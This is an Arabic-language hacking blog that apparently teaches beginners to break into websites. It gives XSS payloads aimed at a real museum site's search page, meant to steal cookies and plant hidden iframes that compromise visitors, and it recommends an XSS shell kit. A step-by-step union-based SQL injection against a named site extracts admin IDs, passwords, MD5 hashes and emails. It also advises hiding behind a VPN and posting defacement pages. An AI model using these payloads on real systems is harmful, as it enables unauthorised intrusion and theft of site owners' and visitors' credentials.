‏إظهار الرسائل ذات التسميات hacker. إظهار كافة الرسائل
‏إظهار الرسائل ذات التسميات hacker. إظهار كافة الرسائل

الدرس الثالث جزء الثاني: استغلال ثغرة xss

بسم الله الرحمن الرحيم

الكود المهم في ثغرات xss








كود:

<script>alert(**************)</script><script>alert("XSS")</script>

هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً 

في ثغرات 


هذا السكربت و ظيفته هي سرقة الكوكيز و هذا الكوكيز 

يحتوي على اليوزر نايم و الباسوورد المشفرmd5 

مثلا ناخذ هذا الموقع

https://www.calacademy.org


وريح يكون استغلال مثلا بشكل هذا https://www.calacademy.org/search.php?q=

الكود هذا نحطو في اخير بعد العلامة (=)

نحط هذا الكود وانت يمكن تغير ما بينا قوسين الملف المصاب <script>alert(document.cookie)</script><script>alert("XSS")</script>

المهم يصبح هيك


https://www.calacademy.org/search.php?q=%3Cscript%3Ealert%28document.cookie%2 9%3C/script%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E



هناك العديد من الطرق , وجميعها تعتبر من الطرق البرمجية ( اي حقن اكواد برمجية ) , لذلك كل ما زادت خلفية المخترق في البرمجة كل ما تمكن من التعامل مع هذه الثغرات باحترافية اكثر .
1 – تلغيم الصفحة .
وهنا سيتم حقن اكواد HTML لاضافة صفحة خفية ملغومة في داخل الموقع ( الصفحة ) المصاب

كود:

<html>
 <iframe name=”I1″ src=”https://www.calacademy.org/server.html” marginwidth=”1″ marginheight=”1″ height=”1″ width=”1″ scrolling=”no” border=”0″ frameborder=”0″>
 </iframe>
 </iframe></p>
 </html>
عندها سيتم فتح هذا الموقع بطريقة خفية , وسيتم اختراق كل من دخل للصفحة التي تم حقن الكود فيها .

نسخه من شل G.H.T-XSS -Shell

G.H.T Xss طھط*ظ…ظٹظ„ â—ڈ ظ…ط±ظƒط² طھط*ظ…ظٹظ„ ط´ط¨ظƒط© ط§ظ„طµط§ط¹ظ‚ط© ط§ظ„ط¹ط±ط¨ظٹط©
عدلو علية قبل رفع 
خطورتها :


1- سحب الكوكيز
2- تنفيذ اوامر Java script
3- التلاعب بالضحية
4- عمل DDos Attack.
========================
الاحتياجات :
1- G.H.T Xss Shell
2- asp استضافة تدعم https://hosting.parking.ru/signup.aspx
3- برنامج ftp
4- موقع للتلغيم
المزيد

الدرس ثاني-كيفية كتشاف ثغرات جزء اول

بسم الله الرحمن الرحيم 


اليوم و في درسنا هذا ريحين نشرح كيفية اكتشاف الثغرات خطوة بخطوة

لتعريف Sql injection : وهي ثغرات تحدث في حال إدخال متغير ما على إستعلام (query) للغة قواعد البيانات mysql ومن ثم توجيه إستعلامات مخصصه لإستغلال مثل هذه الثغرات لنحصل على الهدف النهائي وهو إستخراج المعلومات من قاعدة البيانات بشكل كامل و غير شرعي , ويوجد للثغرة عدة لنذكر إثنين منها : 




error based sql injection
blind sql injection

في النوع الأول يكون إستغلال الثغرة ميسر ومن دون اي مشاكل وبسرعه تامه.

اما في النوع الثاني تكون المشاكل في تخمين إسم ونوع الجداول والصفوف مما يؤدي إلا تأخر العمليه (ولكنها تتم بالنهاية).

ومن الجدير بالذكر أيضاً أن هذه الثغرات تستهدف الكثير من اللغات البرمجية مثل php , java , asp , aspx.

نبدء في طريقة White Box والتي سوف نقوم بشرح أكودا الثغرة المكتوبه بلغة Php بالإعتماد على لغة Mysql




نلاحظ في الصورة السابقه ولنشرح المكونات

السكربت يعمل إدراج لملف config.php والذي يتصل بدورة بقواعد البيانات.
السطر رقم 5 نلاحظ تعريف المتغير name بالقيمه المدخله من نوع POST والتي تتمثل بالحقل name.
بالسطر رقم 7 نلاحظ عمل إستعلام (mysql query ) والذي يحاول إختيار جميع الحقول الموجوده في الجدول name ومطابقتها مع المتغير.
بالسطر رقم 14 نشاهد عنوان ومعلومات النموذج (form) وهي قيمه POST كوسيلة لإرسال البيانات ومعالجتها بملف index.php.

لنأتي الأن لشرح تفاصيل الثغرة ومعرفة كيفية حدوثها , نشاهد أن المتغير لم يفلتر ولم يحدد ما هو من قبل المبرمج لذلك يسمع بإدخال جميع الأوامر والتعابير إلى الإستعلام مما يمكن حقن كود يؤدي لحدوث خطأ ينتج عنه ثغرة sql injection يؤدي إلى إستخراج جميع المعلومات الموجوده في خادم قواعد البيانات. هكذا نكون فسرنا الكود وإكتشفنا الثغرة الموجوده بالسكربت بكل سهوله من خلال قرأة المدخلات والتحقق من عدم فلترتها.

الأن لنأتي إلى إستكشاف الصفحه ومن ثم محاولة إستغلال الثغرة, لنلقي الأن نظرة على الفورم من خلال هذه الصورة




نلاحظ وجود فورم بسيط , لنحاول إدخال أي قيمه لنلاحظ ان الفورم لم يحرك ساكن ! ممتاز لنحاول الأن إدخال علامه (‘) single quote ومن ثم ملاحظه ما سوف يحدث من خلال هذه الصورة




حلو الكلام

وفي طريقة اليدوية يعني بدون برامج مثلا

نستخدم الامر
order by
لمعرفه عدد الاعمده المصابه

نبلش من 1
ونزود لحتى يختفي معانا الخطأ

كود:
order by 1-- 
  
order by 5-- 
  
order by 10-- 
  
order by 15--

لاحظ اشاره الناقص في اخر الرابط -- يمكن استبدالها في بعض المواقع بالاشاره */
اي هكذا


كود:
order by 1/*

order by 15--

هنا ظهر الخطأ

النتيجه تجاوزنا عدد الاعمده المحدد
الحل نبدأ بتقليل عدد الاعمده الى ان يعود الوضع الي ما كان عليه
order by 14
لاحظ الان الموقع تمام
ما فيه ايا خطأ
اذا عدد الاعمده تمام
نضيف الامر التالي
مع الاعمده

union select
ونضيف قبل الرقم علامه الناقص
يصير الرابط هيك





الان لنعرف اصدار القاعده
نكتب

كود:
version()

بعض الاوامر


database()
version()
user()
الان نضيف للحقنه 
كود:
concat(table_name,0x3a,column_name,0x3a,table_schema)
كود:
+from+information_schema.columns--

فتصبح



الان نضيف الامر التالي




ههههههههه تفائلو

كود:
where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)


شوف اخي اطلع ع النتائج بتلقى الجداول المهمه هي
الادمن
اليوزر
بس احنا بدنا نخترق الادمن وهو المتوقع هدفنا يلا نصيده

SurveyAdmins:admin_password:SURVEYS
SurveyAdmins:admin_md5_password:SURVEYS


انتو شايفين عنا خيارين الاول هو الي مطلوب نشوف كيف نعمل
ندخل لي هذا الموقع
تشفير اسم الجدول وعنا اسم الجدول هو مثلا SurveyAdmins نوع التشفير هو مثلا


كود:
MySql hex-encoded string

يصير الان بحث من اسم هدا الجدول وذلك من خلال الامر where+table_name= يعني هيك

كود:
where+table_name=0x15248796335b5tr55

الاستغلال


ما شاء الله طلع لنا خيارات كثيره الان خلينا نجمع الاستغلال اسم الجدول SurveyAdmins 

نجمعها كلها مع بعض بالامر concat وبتصير هيك concat(name,0x3a,pass)[/COLOR]
كود:
 ;admin_id;admin_fname;admin_lname;admin_md5_password;admin_password ;admin_email;admin_perm;
نجمعهم الامر

كود:
concat(admin_id,0x3a,admin_fname,0x3a,admin_lname,0x3a,admin_md5_password,0x3a,admin_password ,0x3a,admin_email,ox3a,admin_perm)
نركبه بالحقنه

كود:
http://www.the--king.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(admin_id,0x3a,admin_fname,0x3a,admin_lname,0x3a,admin_md5_password,0x3a,admin_password ,0x3a,admin_email,0x3a,admin_perm),7,8,9,10,11,12,13,14+from+SURVEYS.SurveyAdmins--

انتهى الجزء اول من شرح ثغرات انتضرونا في الحلقة القادمة ان شاءالله

المزيد

الدرس الاول : مفاهيم ومصطلحات هامة

بسم الله الرحمن الرحيم 



نبدأ بي اول درس في دورة


المهم في دورات كثيرة في نات بس المشكلة ما نفهم بشكل جيد وخاصتا مبتدئ


اليوم رايحين نشرح مفاهيم اختراق يعني يعني شو اختراق وكيف نبدء

اول شي ه تغيير ايبي هيك تبقى مجهول يعني تعمل اتصال vpn


ما معنى قواعد البيانات

قواعد البيانات هي عبارة عن جداول منظمة يتم فيها تخزين معلومات وبيانات معينية يوجد الموقع قاعدة بيانات يتم فيها حفظ المعلومات لما يقوم صحب الموقع برفع ملفات السكربت في ملف اسمو config.php في هذا الملف يتم وضع اسم قاعدة البيانات والباسورد
وبعدها يجي تنصيب install بعد انتهاء التنصيب تروح كل ملفات وتحفض في قاعدة

حلو الكلام 

صفحات إستاتيكية:

هي صفحات المكتوبه في لغة html وهي صفحات ثابتة المحتوى اي لا تتغير الا عندما يتم التغير في كود الصفحة
الصفحات الديناميكية:
هي الصفحة المكتوبه بلغة البي اتش بي php وهي صفحات متغيره ، تتغير حسب تأثير المستخدم عليها ، وتكون مرتبطه في قاعدة بيانات حتى تعمل في شكل جيد

server:

هو جهاز كمبيوتر بمواصفات عالية واتصال نت عالي ، يعمل على نظام لينوكس او ويندوز ، ويضع عليه المواقع حتى تعمل يعني هو مخزن هو وقود الموقع 


Data Center:
هو مكان واسع ، يكون داخله سيرفرات عديده ، تضع السيرفرات في الداتا سنتر لانه يوجد في الداتا سنتر سرعة اتصال عالي

لوحة تحكم المواقع
يوجد للمواقع لوحات تحكم عديده ويستخدمها اصحاب المواقع للتحكم بملفات الموجوده على الموقع الخاص بهم مثل cpanal

غلب مواقع تعمل بلوحة التحك cpanal


linux:
هو نظام تشغيل مثل الويندوز لكنه مفتوح المصدر سهل التحكم فيه ،يعمل على أجهزة الكمبيوتر ، واغلب المواقع تعمل على نظام اللينكس بوجد داخله ادوات مفيده

اندكس الإختراق :



هي صفحة مكتوبة بلغة ال html يتم تصميمها عن طريق برنامج الفرونت بيج او اكسبريشن ويب الخ
وهذا اندكس يرفعة الهكرز فيواجهة الموقع حتي يعلن انة اخترقه


ان شاء الله تكونو فهمتو الدرس اول

المزيد